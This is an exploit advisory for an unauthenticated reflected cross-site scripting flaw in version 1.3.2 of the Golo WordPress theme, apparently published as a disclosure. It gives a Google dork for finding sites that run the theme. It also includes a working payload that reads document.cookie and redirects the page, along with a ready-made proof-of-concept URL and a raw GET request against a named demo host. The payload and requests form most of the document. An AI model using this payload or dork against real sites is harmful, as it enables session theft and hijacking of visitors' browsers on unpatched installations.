[+] Exploit Title: Golo - City Travel Guide WordPress Theme v1.3.2 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/golo/
[+] Date: 2020-07-01
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Uxper [ http://uxper.co ]
[+] Software Version: 1.3.2
[+] Software Link: https://themeforest.net/item/golo-city-guide-wordpress-theme/25397810
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Golo theme v1.3.2 for WordPress.



### [ Payload: ]

[$] "><img src=x onerror=(alert)(`VLΛDVΞCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">



### [ PoC: ]

[!] https://wp.getgolo.com/?s=%22%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E&post_type=place

[!] GET /?s=%22%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E&post_type=place HTTP/1.1
Host: wp.getgolo.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector